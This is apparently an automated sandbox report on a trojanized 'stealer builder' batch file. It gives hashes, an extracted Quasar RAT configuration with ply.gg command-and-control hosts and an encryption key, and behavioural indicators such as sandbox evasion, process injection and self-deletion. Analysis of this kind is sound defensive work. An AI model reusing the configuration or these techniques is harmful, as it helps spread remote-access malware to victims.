Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
04-12-2024 09:28
Static task
static1
Behavioral task
behavioral1
Sample
Obekräftade 974555.zip
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
naive-stealer-main/Naive Builder.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
naive-stealer-main/Naive Builder.bat
-
Size
12.8MB
-
MD5
a2e3e4286e8b22b3b021a6706b899dd7
-
SHA1
e6179204735421c3927f27c13f9751af1dce9bd2
-
SHA256
efd80dd8487437f58413be6e7d2da6ea866ae7626b3225dbf326e8c82c85e580
-
SHA512
3ff5d19accd1fa6765ffc3554bb9cfe3989eee4cf226c2ce7abbaff47a1586253ab1b408f4f9e47611ea7d2415f3298b12dfada1d1987d43c2efa16aac11e3e8
-
SSDEEP
49152:JZHKpAhg6/Ri76PuM0gcqQP+GBRa1SgA+754EU1kOeTUliFDvnrNqjdsusoj8nNc:e
Malware Config
Extracted
quasar
1.0.0.0
v15.6.3 | xen
studies-royal.at.ply.gg:31849
usa-departments.at.ply.gg:37274
category-in.at.ply.gg:42204
bd62476d-8a2b-4e05-a8e5-68cc94baac4f
-
encryption_key
AA41DD5506DCFCA6EE3BF934CC3C9319F80E5E10
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
5000
-
startup_key
$sxr-seroxen
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3288-56-0x000002D7255B0000-0x000002D725D6C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
Naive Builder.bat.exe$sxr-powershell.exedescription pid Process procid_target PID 1056 created 632 1056 Naive Builder.bat.exe 5 PID 3288 created 632 3288 $sxr-powershell.exe 5 PID 3288 created 632 3288 $sxr-powershell.exe 5 PID 1056 created 632 1056 Naive Builder.bat.exe 5 PID 1056 created 632 1056 Naive Builder.bat.exe 5 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Naive Builder.bat.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation Naive Builder.bat.exe -
Deletes itself 1 IoCs
Processes:
Naive Builder.bat.exepid Process 1056 Naive Builder.bat.exe -
Executes dropped EXE 3 IoCs
Processes:
Naive Builder.bat.exe$sxr-powershell.exe$sxr-powershell.exepid Process 1056 Naive Builder.bat.exe 3288 $sxr-powershell.exe 2408 $sxr-powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
Processes:
$sxr-powershell.exe$sxr-powershell.exepid Process 3288 $sxr-powershell.exe 2408 $sxr-powershell.exe -
Drops file in System32 directory 21 IoCs
Processes:
svchost.exeNaive Builder.bat.exesvchost.exe$sxr-powershell.exeOfficeClickToRun.exedescription ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\System32\vcruntime140d.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File created C:\Windows\System32\vcruntime140_1d.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\System32\vcruntime140d.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\System32\ucrtbased.dll Naive Builder.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
Naive Builder.bat.exe$sxr-powershell.exedescription pid Process procid_target PID 1056 set thread context of 2548 1056 Naive Builder.bat.exe 93 PID 3288 set thread context of 2276 3288 $sxr-powershell.exe 95 PID 3288 set thread context of 1720 3288 $sxr-powershell.exe 97 PID 1056 set thread context of 5876 1056 Naive Builder.bat.exe 99 PID 1056 set thread context of 1216 1056 Naive Builder.bat.exe 100 -
Drops file in Windows directory 6 IoCs
Processes:
Naive Builder.bat.execmd.exedescription ioc Process File opened for modification C:\Windows\$sxr-mshta.exe Naive Builder.bat.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe Naive Builder.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Naive Builder.bat.exe File created C:\Windows\$sxr-mshta.exe Naive Builder.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 928 cmd.exe 3280 PING.EXE -
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exemousocoreworker.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
wmiprvse.exemousocoreworker.exemousocoreworker.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 3024 taskkill.exe -
Modifies data under HKEY_USERS 29 IoCs
Processes:
mousocoreworker.exeOfficeClickToRun.exesvchost.exesvchost.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DFB2A9A" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 09:30:50 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\001840102DFB2A9A = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000008908107a9e8bcf4fa1bbf80efb7a6b150000000002000000000010660000000100002000000069eee687bfece3623202d79e944468b9c4f45cc3add3d8d7ab607d4fecebaed6000000000e800000000200002000000002bf5b7c4ce97d3693b7ce7ebad21b7ca636966270ff95b9ccce84d5807757ac8000000063eb5a4016c61c02a231c874a89e0abd3f6113945e1263693f507a8a19dc28e67c5abcba73ae07d7166598207282788136c21da84a774ea51f78fe8019dee91c68f79d05f779d5bb617b213328809548d73e600a5a73ae14326599a596cd61286b066f47c926a311ae2bb6cabf7c80abd607ba4a2476115078fbb4cda50d510540000000916a69e45dcbb59c19a31ce91793c7a0d7692d21b153851a1ec142160c91871ac6dbca76cac3455f4c1ca80e836c5411e82ca7d4690abb5ca68d602d011fedac mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733304649" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000008908107a9e8bcf4fa1bbf80efb7a6b1500000000020000000000106600000001000020000000a3d31f015037b5dc7b913a1f19f2bea3dde88eb563ef66a05e20ccf104cec8ad000000000e80000000020000200000009a7b5e8a342263bdf7a5e1a58be2844f85293b9658d343cbed31bf180c5802f9b0030000f5be9f000368aa56b6beb33acd7b5d114f8d050ef5cc7384bb7172c95cca4387b8a3930875b80b8fdca04d296b7e7cc0464fd4f750838ca74cf5f00bc055fb34d39830d4e917a2944f8e5869ce5fb08ce036cc899bce2412f4b493f0f6f08a4be1aa834d28bb9a9c72b99e9015ab1f63a135f69f426d3eb5a123173ee068139f13c69a6091cf2fa3e8a697ac642fd13b1d372fbddcd037b95a9751b7b254e8afd9af6387d620e79fa2f442fbf4d861ef85463a1c5a3a08e69617428b2a1d997f2121477bac4f1700d5ddc75c74d15d6a0135e0766a37e186a596ab094d55a1cd201889866f81178257176d5e9da10629a315831062c2ca89a2c47aa39d6f52ee20475c1890c5b849e3f74164ac7ca343d7e7101d1b74ed0b166f7b50c6ecf37c84109972dfdcfa2543597beb5680a5d2b72483a9ef00dd468f6432d97cf97fb63f801966281ef5d041e0e8eb4e9c6242bb8cc2175e3b3ddbd281f564daeb33b7364ab54d325531679a44764184e7d63609d05c987f09a5e17900759d68ff0d478f0b32104a91d32a3feb38d152798769527714d6a12aded99a0ffff0bf0d8acf49b437b94865c107096935cdef8e6385e29bc98208d8a121f7ad85fe548d29d0f3b55adf8d057c64d95f15fe4e633b2d09396207746e032755a2008bdc445b569733cac8dad408c59b3c567d43a9c50ff6a0ae1718b324dd2ba88403eb784f0d17ff1363d2fe8bce059da193383aa9bc83883dd96a37e51856632ea2fc48abf3430a08739cb4fffd01e0c232c8e05895d7fb208b6bec1757808158fbc30edd615383a0d4be816ebc4defc32a3d942137bc56c3a9d51cd27745017fdd9681bf463e984748b7145745557ee8346b452e0cc66322bf07f847b35583fbe8e9ee446f137506469fb55316a5704f45283217c4b977ff70079e03d811cf6315ca81d09cc5922bece2b710f5e01a11ebe0ec9efaf3c4be92d995d5d6e65b163581100723d65355fceecc2ae4b64248ddeec72beb82498e5e2535cd64ab243928d539f73589844eeb9319e84e5ab606638d9ba22952f91e8ef8c70531f2f6f1874613e37ec953e28472a68f602567360fcee2eebb9cf0d9858507887810ed2a8c9dadaf2ff3a58580e8c0c68f5eef69854056e67e65516314f640a43b8f1a44c7bdb5194ccf7a3642c5102d08ad93f49beee0a1ff7578ff5169b1ed55201f70f4d9842bb33257a5bac49c0d929a24070976a0d9571d088ea288ec786d158a8f9eaef5f86a1b544f1eecefcc17e1fce7aa3e298c399543026a855f741fe4db57517ae2ef56e52bea6e296615384c26379713b4d4e44000000058b665d6def8cdb75986aa088d8a351999f7b3f4380b3e675cfa3493812c37843e19c049dd8a3578102d49b7976937ad94c2c1f275ace8d0abfc317e4c79e400 mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={FF03C59F-8B1A-4917-92D7-93C74CBDDEEA}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DFB2A9A" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Naive Builder.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exepid Process 1056 Naive Builder.bat.exe 1056 Naive Builder.bat.exe 1056 Naive Builder.bat.exe 2548 dllhost.exe 2548 dllhost.exe 2548 dllhost.exe 2548 dllhost.exe 1056 Naive Builder.bat.exe 1056 Naive Builder.bat.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 2276 dllhost.exe 2276 dllhost.exe 2276 dllhost.exe 2276 dllhost.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 2408 $sxr-powershell.exe 2408 $sxr-powershell.exe 3288 $sxr-powershell.exe 1720 dllhost.exe 1720 dllhost.exe 2408 $sxr-powershell.exe 2408 $sxr-powershell.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Naive Builder.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exesvchost.exesvchost.exedescription pid Process Token: SeDebugPrivilege 1056 Naive Builder.bat.exe Token: SeDebugPrivilege 1056 Naive Builder.bat.exe Token: SeDebugPrivilege 2548 dllhost.exe Token: SeDebugPrivilege 3288 $sxr-powershell.exe Token: SeDebugPrivilege 3288 $sxr-powershell.exe Token: SeDebugPrivilege 2276 dllhost.exe Token: SeDebugPrivilege 2408 $sxr-powershell.exe Token: SeDebugPrivilege 3288 $sxr-powershell.exe Token: SeDebugPrivilege 1720 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAuditPrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$sxr-powershell.exeConhost.exepid Process 3288 $sxr-powershell.exe 2872 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid Process 3636 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exeNaive Builder.bat.exe$sxr-powershell.exedllhost.exedescription pid Process procid_target PID 4584 wrote to memory of 3808 4584 cmd.exe 82 PID 4584 wrote to memory of 3808 4584 cmd.exe 82 PID 3808 wrote to memory of 1252 3808 net.exe 83 PID 3808 wrote to memory of 1252 3808 net.exe 83 PID 4584 wrote to memory of 1056 4584 cmd.exe 84 PID 4584 wrote to memory of 1056 4584 cmd.exe 84 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 3288 1056 Naive Builder.bat.exe 94 PID 1056 wrote to memory of 3288 1056 Naive Builder.bat.exe 94 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2408 3288 $sxr-powershell.exe 96 PID 3288 wrote to memory of 2408 3288 $sxr-powershell.exe 96 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 1720 wrote to memory of 632 1720 dllhost.exe 5 PID 1720 wrote to memory of 688 1720 dllhost.exe 7 PID 1720 wrote to memory of 968 1720 dllhost.exe 12 PID 1720 wrote to memory of 420 1720 dllhost.exe 13 PID 1720 wrote to memory of 436 1720 dllhost.exe 14 PID 1720 wrote to memory of 740 1720 dllhost.exe 15 PID 1720 wrote to memory of 752 1720 dllhost.exe 16 PID 1720 wrote to memory of 1076 1720 dllhost.exe 17 PID 1720 wrote to memory of 1104 1720 dllhost.exe 18 PID 1720 wrote to memory of 1132 1720 dllhost.exe 19 PID 1720 wrote to memory of 1200 1720 dllhost.exe 20 PID 1720 wrote to memory of 1272 1720 dllhost.exe 22 PID 1720 wrote to memory of 1320 1720 dllhost.exe 23 PID 1720 wrote to memory of 1344 1720 dllhost.exe 24 PID 1720 wrote to memory of 1360 1720 dllhost.exe 25 PID 1720 wrote to memory of 1524 1720 dllhost.exe 26 PID 1720 wrote to memory of 1568 1720 dllhost.exe 27 PID 1720 wrote to memory of 1596 1720 dllhost.exe 28 PID 1720 wrote to memory of 1688 1720 dllhost.exe 29 PID 1720 wrote to memory of 1732 1720 dllhost.exe 30 PID 1720 wrote to memory of 1796 1720 dllhost.exe 31 PID 1720 wrote to memory of 1840 1720 dllhost.exe 32 PID 1720 wrote to memory of 1976 1720 dllhost.exe 33 PID 1720 wrote to memory of 1984 1720 dllhost.exe 34 PID 1720 wrote to memory of 1992 1720 dllhost.exe 35 PID 1720 wrote to memory of 1036 1720 dllhost.exe 36 PID 1720 wrote to memory of 1208 1720 dllhost.exe 37 PID 1720 wrote to memory of 2116 1720 dllhost.exe 38 PID 1720 wrote to memory of 2216 1720 dllhost.exe 40 PID 1720 wrote to memory of 2332 1720 dllhost.exe 41 PID 1720 wrote to memory of 2452 1720 dllhost.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1076
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7d50530d-3820-4ee1-84d3-f6176f3b0029}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b84deb7f-7243-4ae3-86eb-bac0e4178d51}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{011e311b-be34-4675-8a1d-5c78776361cb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a5d80aa4-8f62-4e9d-b96e-ec241d4e7440}2⤵PID:5876
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8d8dfa74-db64-40fe-a3dc-d9798da551c4}2⤵PID:1216
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:420
-
